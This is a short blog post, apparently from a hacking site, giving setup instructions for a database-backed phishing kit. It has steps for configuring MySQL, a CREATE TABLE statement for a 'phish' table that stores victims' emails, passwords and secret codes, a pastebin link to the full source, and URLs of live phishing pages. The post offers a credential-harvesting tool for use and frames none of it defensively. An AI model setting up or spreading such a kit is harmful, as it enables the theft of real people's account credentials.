Full Source : http://pastebin.com/K5bKMJLx[1]
/.Tutorial
1.Set Up Your MySQL User,Password and DB_Name.
2.Find $username,$password,$dbname and replace it.
3.Open phpmyadmin,excute this SQL .
CREATE TABLE phish(
id INT NOT NULL AUTO_INCREMENT,
PRIMARY KEY(id),
username TEXT,
password TEXT,
victimemail TEXT,
victimpass TEXT,
secretcode TEXT
)
4.If Created,Just Paste INDEX.php to index.php and etc.
Live :
– http://v1.hpi.or.id/phish/index.php (INDEX.php)
– http://v1.hpi.or.id/phish/register.php (REGISTER.php)
– http://v1.hpi.or.id/phish/login.php (LOGIN.php)
References
- ^ http://pastebin.com/K5bKMJLx (pastebin.com)
- ^ Email This (www.blogger.com)
- ^ BlogThis! (www.blogger.com)
- ^ Share to Twitter (www.blogger.com)
- ^ Share to Facebook (www.blogger.com)
- ^ Share to Pinterest (www.blogger.com)
Sumber : http://0b0xed.tor.my/
0 Response to "[MySQLi - OOP] Phishing - DB"
Post a Comment